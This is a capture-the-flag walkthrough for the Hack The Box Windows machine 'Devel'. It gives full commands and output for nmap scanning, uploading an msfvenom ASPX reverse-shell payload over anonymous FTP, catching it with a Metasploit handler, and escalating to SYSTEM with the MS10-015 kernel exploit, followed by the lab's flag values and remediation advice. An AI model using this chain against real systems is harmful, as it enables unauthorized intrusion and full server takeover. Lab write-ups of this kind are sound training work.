htb-writeups

Devel HTB Walkthrough

Machine Information

• Name: Devel
• IP Address: 10.129.2.151
• Operating System: Windows
• Difficulty: Easy
• Points: 20

Executive Summary

Devel is a Windows-based Hack The Box machine that demonstrates common misconfigurations in web services. The machine features anonymous FTP access with write permissions and an IIS web server, allowing for easy initial foothold through web shell upload. Privilege escalation is achieved through a known Windows kernel vulnerability.

---

Reconnaissance

Initial Scan

We begin with a comprehensive Nmap scan to identify open ports and services:

export target=10.129.2.151
sudo nmap -p- --min-rate 1000 -sT -vvv $target

Scan Results:

Discovered open ports: 21/tcp (FTP), 80/tcp (HTTP)

Service Enumeration

Perform detailed service version detection and script scanning:

sudo nmap -sC -sV -p 21,80 -T4 $target

Detailed Results:

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| http-methods: 
|_  Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Key Findings

1. FTP Service (Port 21)
   • Microsoft FTPd running
   • Anonymous authentication enabled
   • Write access permitted
   • Contains web directory files
2. HTTP Service (Port 80)
   • Microsoft IIS 7.5
   • Default IIS7 page visible
   • TRACE method enabled (potential security risk)

---

Initial Foothold

FTP Analysis

Anonymous FTP login reveals the web root directory:

ftp $target
Name: anonymous
Password: [any email or blank]

Directory Contents:

03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png

Web Shell Deployment

Since FTP allows anonymous write access and the directory serves web content, we can upload a malicious ASPX file:

msfvenom -p windows/meterpreter/reverse_tcp -f aspx LHOST=10.10.14.106 LPORT=4444 > exploit.aspx

Upload the payload via FTP:

ftp> put exploit.aspx

Reverse Shell Setup

Configure Metasploit handler:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.106
set LPORT 4444
run

Initial Access Obtained:

[*] Started reverse TCP handler on 10.10.14.106:4444
[*] Sending stage (175174 bytes) to 10.129.2.151
[*] Meterpreter session 7 opened (10.10.14.106:4444 -> 10.129.2.151:49158)

Initial Compromise Verification

meterpreter > getuid
Server username: IIS APPPOOL\Web

---

Privilege Escalation

System Enumeration

The initial shell runs with limited privileges under the IIS application pool identity. We need to escalate to SYSTEM.

Local Exploit Suggester

Use Metasploit’s local exploit suggester to identify potential privilege escalation vectors:

meterpreter > background
use post/multi/recon/local_exploit_suggester
set SESSION 7
run

Identified Vulnerabilities:

[+] The target appears to be vulnerable.
1. exploit/windows/local/bypassuac_comhijack
2. exploit/windows/local/bypassuac_eventvwr
3. exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move
4. exploit/windows/local/ms10_015_kitrap0d

Kernel Exploit (MS10-015)

The machine is vulnerable to the classic KiTrap0D vulnerability:

use exploit/windows/local/ms10_015_kitrap0d
set SESSION 7
set LHOST 10.10.14.106
set LPORT 9009
run

Privilege Escalation Successful:

[*] Started reverse TCP handler on 10.10.14.106:9009 
[*] Reflectively injecting payload and triggering the bug...
[*] Launching msiexec to host the DLL...
[+] Process 3804 launched.
[*] Reflectively injecting the DLL into 3804...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (177734 bytes) to 10.129.2.151
[*] Meterpreter session 2 opened (10.10.14.106:9009 -> 10.129.2.151:49178)

Privilege Verification

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > shell
whoami
nt authority\system

hostname
devel

---

Post-Exploitation

Flag Acquisition

User Flag:

type C:\users\babis\desktop\user.txt
ff43ea9f8efca09c9d96e106888ae28b

Root Flag:

type C:\users\administrator\desktop\root.txt
d0c3687882cfedfadfd6015e8eba9664

System Information Gathering

Additional system information collected:

• Windows 7 Build 7600
• x86 Architecture
• Greek system language setting
• HTB domain member

---

Security Assessment & Remediation

Critical Vulnerabilities Identified

1. Anonymous FTP with Write Access
   • Risk: Critical
   • Impact: Allows unauthorized file upload leading to remote code execution
   • Remediation:
     • Disable anonymous FTP access
     • Implement strong authentication
     • Restrict write permissions
     • Use SFTP instead of FTP
2. Outdated Windows System
   • Risk: High
   • Impact: Vulnerable to known kernel exploits
   • Remediation:
     • Apply Windows security updates
     • Specifically patch MS10-015 vulnerability
     • Implement regular patch management
3. IIS Misconfiguration
   • Risk: Medium
   • Impact: TRACE method enabled, potential information disclosure
   • Remediation:
     • Disable unnecessary HTTP methods
     • Implement proper web application firewall rules

Defense Recommendations

1. Network Security
   • Implement network segmentation
   • Use firewall rules to restrict unnecessary services
   • Monitor for anomalous FTP activity
2. Access Control
   • Principle of least privilege for service accounts
   • Regular access reviews
   • Strong password policies
3. Monitoring & Detection
   • File integrity monitoring on web directories
   • SIEM alerts for privilege escalation attempts
   • Regular security audits

---

Tools Used

• Nmap: Network reconnaissance and service enumeration
• Metasploit: Exploitation framework and payload generation
• MSFVenom: Payload creation
• FTP Client: File transfer and verification

---

Conclusion

The Devel machine demonstrates the critical importance of proper service configuration and patch management. The combination of anonymous FTP write access and unpatched system vulnerabilities created a perfect storm for complete system compromise. This scenario underscores the necessity of:

• Regular security patching
• Proper service configuration
• Principle of least privilege
• Comprehensive security monitoring

Difficulty Level: Easy
Key Learning: Never allow anonymous write access to web directories

---

This walkthrough is for educational purposes only. Always ensure you have proper authorization before conducting security testing.